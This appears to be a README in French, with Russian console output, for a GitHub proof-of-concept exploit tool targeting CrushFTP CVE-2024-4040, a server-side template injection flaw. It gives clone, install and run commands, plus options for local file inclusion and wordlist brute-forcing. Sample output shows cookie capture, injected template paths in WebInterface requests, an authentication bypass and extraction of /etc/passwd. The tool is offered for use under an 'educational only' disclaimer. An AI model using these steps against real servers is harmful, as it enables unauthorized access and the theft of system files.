
est un PoC pour l'outil CVE-2024-4040 exploitant la vulnérabilité SSTI dans CrushFTP
GenCrushSSTIExploit est un outil exploit PoC ciblant la vulnérabilité SSTI (Server-Side Template Injection) dans CrushFTP CVE-2024-4040. Cet outil démontre comment exploiter cette vulnérabilité à des fins éducatives et de test d'intrusion éthique uniquement.
rich pour une sortie console élégante et stylisée.⚠️ Utilisez cet outil de manière responsable ! Il est destiné uniquement à la recherche et à des fins éducatives. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
pip (gestionnaire de paquets Python)git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <URL_CIBLE>
-t / --target : Spécifie l'URL cible du serveur CrushFTP vulnérable.-l / --lfi : Inclusion locale de fichier. Spécifie le fichier à inclure pour extraction.-w / --wordlist : Spécifie une liste de mots pour forcer les chemins de fichiers.python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...